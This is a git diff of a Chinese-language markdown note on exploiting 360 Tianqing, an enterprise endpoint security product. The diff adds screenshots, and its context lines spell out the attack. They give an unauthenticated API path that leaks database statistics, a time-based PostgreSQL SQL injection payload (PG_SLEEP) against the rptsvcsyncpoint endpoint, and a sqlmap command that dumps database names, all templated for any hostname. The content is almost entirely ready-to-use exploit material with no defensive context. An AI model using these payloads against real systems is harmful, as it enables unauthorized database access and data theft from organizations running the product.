diff --git a/360天擎 - 未授权与sql注入.md b/360天擎 - 未授权与sql注入.md
index 7794664..f642f2d 100644
--- a/360天擎 - 未授权与sql注入.md	
+++ b/360天擎 - 未授权与sql注入.md	
@@ -11,7 +11,7 @@
 
 ### 未授权漏洞
 ```路由后拼接/api/dbstat/gettablessize```
-
+![](./assets/20231018183944.png)
 
 ### sql注入漏洞
 比较推荐的方式先测试是否存在数据库信息泄露，存在的话大概率存在SQL注入
@@ -20,5 +20,7 @@
 
 {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
 ```
+![](./assets/20231018184057.png)
+
 ## sqlmap
 python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1